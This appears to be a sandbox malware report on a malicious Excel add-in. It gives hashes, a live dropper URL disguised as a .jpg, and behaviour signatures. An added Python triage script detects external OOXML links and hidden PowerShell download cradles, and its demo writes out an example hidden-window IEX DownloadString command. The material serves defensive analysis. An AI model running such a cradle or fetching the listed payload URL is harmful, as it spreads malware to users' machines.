General

  • Target

    RFQTLPO2414.xla

  • Size

    370KB

  • Sample

    240821-n41wzs1aqn

  • MD5

    9b2f48677d72f952d32113a2656534c9

  • SHA1

    557f90e41483f5dac7f42acabfad8a6b96b49422

  • SHA256

    9d5316038e869e6de1069cd0579e7e78f2a36f526bc3275ee67fe787ae7e6ea3

  • SHA512

    4f2de924ccc32b25c175fabd3b148e227cd731708c446ffb9f7d00ff54b435faea464b2b3a98a5f183c2338972dc60bea3cd24154fd5bd69e226a7094dbaa1ea

  • SSDEEP

    6144:Rlp+aufDHYN/5MXBoyP3wqohOt4KnOFYnITzFnpM6zJAbpvjlhfEC:RlKfu5G43LnB66z2bpv4C

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated URLs

    ps1.dropper
    https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

    exe.dropper
    https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

    The same archive.org object is recorded as the source of both the PowerShell and the executable stage; the .jpg extension does not describe what is served.

Targets

    • Target

      RFQTLPO2414.xla

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with a hidden display window.

    • Abuses OpenXML format to download file from external location

    • Drops file in System32 directory
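Two of the signatures above describe concrete, checkable artefacts: an OOXML relationship whose TargetMode is External (the mechanism behind "Abuses OpenXML format to download file from external location") and a PowerShell command line that hides its window and carries a download cradle. The script below is an added triage example, not the sandbox's own detection logic and not code recovered from RFQTLPO2414.xla. The package it inspects is constructed in memory as a stand-in for an OOXML document, the command lines are constructed, and the https://example.invalid URL is a placeholder.

```python
"""Added triage helpers for two behaviours listed in the report above.

Constructed inputs only: the zip built here stands in for an OOXML
document and is NOT the analysed sample; the URLs are placeholders.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_targets(data: bytes) -> list[tuple[str, str, str]]:
    """Return (rels part, relationship type, target) for every relationship
    in the package with TargetMode="External".

    An OOXML file is a zip; each *.rels part lists what a part links to.
    An External target with an http(s) URL (e.g. oleObject, attachedTemplate,
    externalLink) is how a document pulls content from outside the file.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))  # stdlib expat: no external entity fetch
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rtype, rel.get("Target", "")))
    return found


def remote_targets(data: bytes) -> list[tuple[str, str, str]]:
    """Only the external relationships that point at an http(s) URL."""
    return [t for t in external_targets(data)
            if t[2].lower().startswith(("http://", "https://"))]


# powershell.exe / pwsh at the start or after a path separator or quote.
PS_RE = re.compile(r"(?:^|[\\/\s\"'])(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# -WindowStyle Hidden, including every unambiguous prefix PowerShell accepts
# (-w, -win, -window, ...), separated from the value by whitespace.
HIDDEN_RE = re.compile(
    r"-w(?:i(?:n(?:d(?:o(?:w(?:s(?:t(?:y(?:l(?:e)?)?)?)?)?)?)?)?)?)?\s+hidden\b", re.I)
# Common download primitives seen in first-stage PowerShell.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|"
    r"Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|\b(?:iwr|irm|curl|wget)\b",
    re.I)


def classify_powershell(cmdline: str) -> dict[str, bool]:
    """Flag a process command line for the PowerShell behaviours above."""
    is_ps = PS_RE.search(cmdline) is not None
    return {
        "powershell": is_ps,
        "hidden_window": bool(is_ps and HIDDEN_RE.search(cmdline)),
        "download_cradle": bool(is_ps and CRADLE_RE.search(cmdline)),
    }


def build_sample_package() -> bytes:
    """Constructed minimal package with one internal and one external
    relationship. Placeholder content, not the real sample."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}oleObject" '
        'Target="https://example.invalid/stage2.bin" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("xl/_rels/workbook.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in remote_targets(build_sample_package()):
        print("external relationship:", hit)
    # Constructed command line shaped like a hidden-window download cradle.
    cmd = ('powershell.exe -WindowStyle Hidden -NoP -c '
           '"IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/x.jpg\')"')
    print(classify_powershell(cmd))
```

To use it on a real file, pass the document bytes to `remote_targets()` and a process-creation command line (from Sysmon event 1 or similar telemetry) to `classify_powershell()`. Note that `external_targets()` only sees zip-based documents; a legacy binary .xla (an OLE compound file) is not a zip and will raise `zipfile.BadZipFile`, which is itself worth recording when the extension and container format disagree.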

MITRE ATT&CK Enterprise v15

Tasks